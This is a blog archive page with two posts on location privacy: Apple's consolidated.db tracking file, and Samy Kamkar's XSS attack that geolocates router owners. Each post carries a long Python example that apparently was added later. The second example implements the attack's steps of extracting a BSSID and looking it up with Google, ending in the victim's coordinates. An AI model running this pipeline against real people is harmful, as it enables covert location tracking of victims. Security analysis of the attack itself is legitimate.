Archive

Posts Tagged ‘XSS’

iDevice tracking.

April 27th, 2011

I’m a little late wading into this but I thought it worth looking at based on my last post.

If you’ve been hiding under a rock: Apple tracks where you have been (regardless of your location tracking setting) in a file called consolidated.db.

Tracked!

This was originally discovered by Alex Levinson back in 2010 when he was researching the iPad.

Long story short, there is an SQLite database both on the iDevice (/private/var/root/Library/Caches/locationd/consolidated.db) and in the backups on your sync machine (/Users/<your user name>/Library/Application Support/MobileSync/Backup/). The positions come from the cell towers the phone sees rather than from GPS, so the accuracy isn’t always bang on, but it is pretty close in most cases.

Recently a couple of researchers from O’Reilly (Alasdair Allan and Pete Warden) wrote an OS X application that visualises the stored data, bringing it out of the deep dark recesses of computer forensics and into the mainstream, and sparking outrage and cries of foul. This in turn forced Apple to respond to these concerns.

You can see in the image “Tracked!” that it has tracked my movements throughout NSW and Canberra. So I decided to have a play myself to see what is captured (instructions on how to find the consolidated.db file are on Pete Warden’s site). With the help of an SQLite viewer I opened up the file to see what was there (see image below):

SQLite file opened

The second table is the interesting one; it contains the location tracking data that everyone is interested in. A view into that table shows exactly what can be found in there:

CellLocation Table Contents

I’ve condensed the columns for Longitude and Latitude, mostly because I don’t want everyone knowing EXACTLY where I’ve been 😉

The interesting thing is that similar information is also being stored for WiFi locations, though I’ll need some time playing about to understand how relevant the stored information is; based on an initial pass it seems to capture any AP that my phone sees. I’ve tested this by plugging random MAC addresses into Google to check against its wireless AP DB and sure enough, these are APs I’ve not connected to but are pretty close to some of the ones I do.
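To make the two tables described above (the cell fixes and the WiFi entries) concrete, here is an added example, not code from the original post or from the iPhoneTracker application, that reads a consolidated.db-style SQLite file and turns it into a time-ordered movement history. It runs against a constructed in-memory copy; pointing open_db() at a real consolidated.db works the same way. Assumptions not stated on the page: the column names other than Latitude, Longitude and MAC (MCC, MNC, LAC, CI, Timestamp, HorizontalAccuracy), and the timestamp epoch (Mac absolute time, seconds since 2001-01-01 UTC, which is why naive tools show every fix 31 years too early).

```python
import sqlite3
from datetime import datetime, timedelta, timezone

# Assumed: consolidated.db timestamps are Mac absolute time (seconds since 2001-01-01 UTC).
MAC_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)
UNIX_TO_MAC_OFFSET = 978307200  # seconds between 1970-01-01 and 2001-01-01


def mac_absolute_to_datetime(ts: float) -> datetime:
    """Convert a consolidated.db Timestamp value to an aware UTC datetime."""
    return MAC_EPOCH + timedelta(seconds=ts)


def open_db(path: str) -> sqlite3.Connection:
    """Open a copy of consolidated.db read-only; ":memory:" gives the constructed sample."""
    if path == ":memory:":
        conn = sqlite3.connect(path)
    else:
        conn = sqlite3.connect(f"file:{path}?mode=ro", uri=True)
    conn.row_factory = sqlite3.Row
    return conn


def build_sample_db() -> sqlite3.Connection:
    """Constructed sample data, not a real consolidated.db. Column names beyond
    Latitude/Longitude/MAC are assumed; the coordinates are made up."""
    conn = open_db(":memory:")
    conn.executescript("""
        CREATE TABLE CellLocation (
            MCC INTEGER, MNC INTEGER, LAC INTEGER, CI INTEGER,
            Timestamp REAL, Latitude REAL, Longitude REAL, HorizontalAccuracy REAL);
        CREATE TABLE WifiLocation (
            MAC TEXT, Timestamp REAL, Latitude REAL, Longitude REAL, HorizontalAccuracy REAL);
    """)
    base = 324950400.0  # 2011-04-20T00:00:00Z expressed in Mac absolute time
    conn.executemany(
        "INSERT INTO CellLocation VALUES (?,?,?,?,?,?,?,?)",
        [
            (505, 2, 1234, 56789, base + 3600, -33.87, 151.21, 500.0),
            (505, 2, 4321, 98765, base + 7 * 3600, -35.28, 149.13, 1500.0),
        ],
    )
    conn.executemany(
        "INSERT INTO WifiLocation VALUES (?,?,?,?,?)",
        [
            ("00:1a:2b:3c:4d:5e", base + 1800, -33.87, 151.21, 30.0),
            ("00:1a:2b:3c:4d:5f", base + 7 * 3600 + 60, -35.28, 149.13, 30.0),
        ],
    )
    return conn


def timeline(conn: sqlite3.Connection) -> list[dict]:
    """Merge cell and WiFi fixes into one time-ordered movement history."""
    rows = conn.execute("""
        SELECT 'cell' AS source, Timestamp, Latitude, Longitude, HorizontalAccuracy
          FROM CellLocation
        UNION ALL
        SELECT 'wifi' AS source, Timestamp, Latitude, Longitude, HorizontalAccuracy
          FROM WifiLocation
        ORDER BY Timestamp
    """).fetchall()
    return [
        {
            "utc": mac_absolute_to_datetime(r["Timestamp"]),
            "source": r["source"],
            "lat": r["Latitude"],
            "lon": r["Longitude"],
            "accuracy_m": r["HorizontalAccuracy"],
        }
        for r in rows
    ]


def seen_aps(conn: sqlite3.Connection) -> list[str]:
    """Distinct access-point MACs the device recorded (the values the post plugged into Google)."""
    return [r["MAC"] for r in conn.execute("SELECT DISTINCT MAC FROM WifiLocation ORDER BY MAC")]


def coarsen(lat: float, lon: float, places: int = 1) -> tuple[float, float]:
    """Round a fix before publishing it, as the post does with its screenshot;
    one decimal place of latitude is roughly 11 km."""
    return (round(lat, places), round(lon, places))


if __name__ == "__main__":
    db = build_sample_db()
    for fix in timeline(db):
        print(fix["utc"].isoformat(), fix["source"], *coarsen(fix["lat"], fix["lon"]))
    print(seen_aps(db))
```

Opening the file read-only matters when you are handling an evidence copy; the UNION of both tables is what gives the full picture, since a WiFi entry often pins you down to a street while the cell entry only gives the suburb.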

Given the high profile this now has, and the ease with which the necessary scripts to grab this information can be found online, I suspect it won’t be long before you see some exploits in the wild and high-profile people start finding that their movements are published.

I hope Apple move to remedy this soon.

UPDATE: I forgot to add that Google also tracks phones and seems to record similar information on WiFi locations picked up by Android devices. I suspect that Apple is doing similar things with the information for their own reasons.

UPDATE2: Apple have released their latest iOS (4.3.3), which addresses some of the issues.

I’ve yet to run it up and review it myself, but it looks like they have made good. Now to see what happens with Google and Microsoft.

XSS and geolocation fun

August 10th, 2010

I’m slowly getting time to digest the goodies that came out of the recent BlackHat 2010 event.

There were a number of really interesting topics covered by awesome people like Jeremiah Grossman, Robert (RSNAKE) Hansen and of course the Hoff!

One of these was Samy Kamkar, of MySpace worm fame, who gave a presentation called “How I Met Your Girlfriend” demonstrating an XSS exploit that works out where someone actually is using Google’s location services.

If you don’t know what XSS (Cross Site Scripting) is:

From Wikipedia: Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.

The exploit is fairly simple. Script injected through an XSS hole in the router’s web interface runs in the victim’s browser in the context of the router’s own pages, so the same-origin policy does not stop it reading them; an AJAX request pulls the router’s status page and extracts the MAC address (the wireless BSSID). That address is then funnelled off to Google’s location service, which returns a set of coordinates for it. Once you have these you can see almost exactly where said person is.

He has a pretty decent overview available on his site here, with functioning proof-of-concept code available here.

Whilst the exploit was only “tested” on a Verizon FiOS router, other routers susceptible to XSS attacks, like D-Link, Linksys, Belkin and of course Cisco, could also be exploited with a modified version.
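The data handling behind the attack, as an added example that is not Samy Kamkar’s proof-of-concept code: pull every candidate MAC out of a router status page (the part that has to be adapted per router model), drop the ones that cannot be a BSSID, build a WiFi geolocation request and read the coordinates out of the reply. In the real attack the injected script does this inside the victim’s browser; here the two network calls are injectable so it runs offline. Assumptions: the status page and the lookup reply are constructed; the request and response shapes follow Google’s current Geolocation API (POST https://www.googleapis.com/geolocation/v1/geolocate, a "wifiAccessPoints" list, a "location" object in the reply), not the 2010 service used in the talk, and the API key is a placeholder.

```python
import json
import re
import urllib.request

# Matches 00:1a:2b:3c:4d:5e and 00-1A-2B-3C-4D-5E style addresses.
MAC_RE = re.compile(r"\b(?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}\b")

GEOLOCATE_URL = "https://www.googleapis.com/geolocation/v1/geolocate"

# Constructed router status page; a real one is fetched via the XSS'd origin.
ROUTER_STATUS_HTML = """
<html><body><h1>Wireless Status</h1>
<table>
<tr><td>SSID</td><td>HomeNet</td></tr>
<tr><td>BSSID</td><td>00-1A-2B-3C-4D-5E</td></tr>
<tr><td>WAN MAC</td><td>00:1a:2b:3c:4d:60</td></tr>
<tr><td>Broadcast</td><td>FF:FF:FF:FF:FF:FF</td></tr>
<tr><td>BSSID (repeat)</td><td>00:1a:2b:3c:4d:5e</td></tr>
</table></body></html>
"""


def normalize_mac(raw: str) -> str:
    """Canonical lower-case, colon-separated form so duplicates collapse."""
    return raw.replace("-", ":").lower()


def is_unicast(mac: str) -> bool:
    """BSSIDs are unicast; multicast/broadcast addresses have the low bit of the first octet set."""
    return int(mac.split(":")[0], 16) & 1 == 0


def extract_bssids(html: str) -> list[str]:
    """Candidate BSSIDs in order of first appearance, de-duplicated."""
    seen: list[str] = []
    for m in MAC_RE.finditer(html):
        mac = normalize_mac(m.group(0))
        if is_unicast(mac) and mac not in seen:
            seen.append(mac)
    return seen


def build_geolocate_request(bssids: list[str]) -> dict:
    """Body for the Geolocation API; considerIp=False forces a WiFi-only answer."""
    return {"considerIp": False,
            "wifiAccessPoints": [{"macAddress": b} for b in bssids]}


def parse_geolocate_response(body: str) -> tuple[float, float, float]:
    """(lat, lng, accuracy_m) from the API's {"location": {...}, "accuracy": ...} reply."""
    reply = json.loads(body)
    loc = reply["location"]
    return (float(loc["lat"]), float(loc["lng"]), float(reply["accuracy"]))


def geolocate_via_google(request: dict, api_key: str) -> str:
    """Real lookup (not called in the offline demo); api_key is a placeholder you supply."""
    req = urllib.request.Request(
        f"{GEOLOCATE_URL}?key={api_key}",
        data=json.dumps(request).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode()


def locate(fetch_status_page, geolocate):
    """The pipeline the injected script performs: read the admin page,
    extract candidate BSSIDs, ask the lookup service, return coordinates."""
    bssids = extract_bssids(fetch_status_page())
    if not bssids:
        return None
    return parse_geolocate_response(geolocate(build_geolocate_request(bssids)))


# Constructed stand-ins for the two network calls so the example runs offline.
def fake_fetch_status_page() -> str:
    return ROUTER_STATUS_HTML


def fake_geolocate(request: dict) -> str:
    assert request["wifiAccessPoints"], "service needs at least one AP"
    return json.dumps({"location": {"lat": -33.8688, "lng": 151.2093}, "accuracy": 25.0})


if __name__ == "__main__":
    print(locate(fake_fetch_status_page, fake_geolocate))
```

The regex-and-filter step is the only part that changes between router models, which is why the post’s point about D-Link, Linksys and the rest holds: once script runs in the router’s origin, the rest of the chain is identical.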

Now if only this could be used for good and not evil. The number of times that some of my bigger customers have moved whole sites and not told people verges on silly.

Other Links & Sources:
Samy’s site: http://sammy.pl
XSS Cheatsheet: http://ha.ckers.org/xss.html
Definition of XSS: http://en.wikipedia.org/wiki/Cross-site_scripting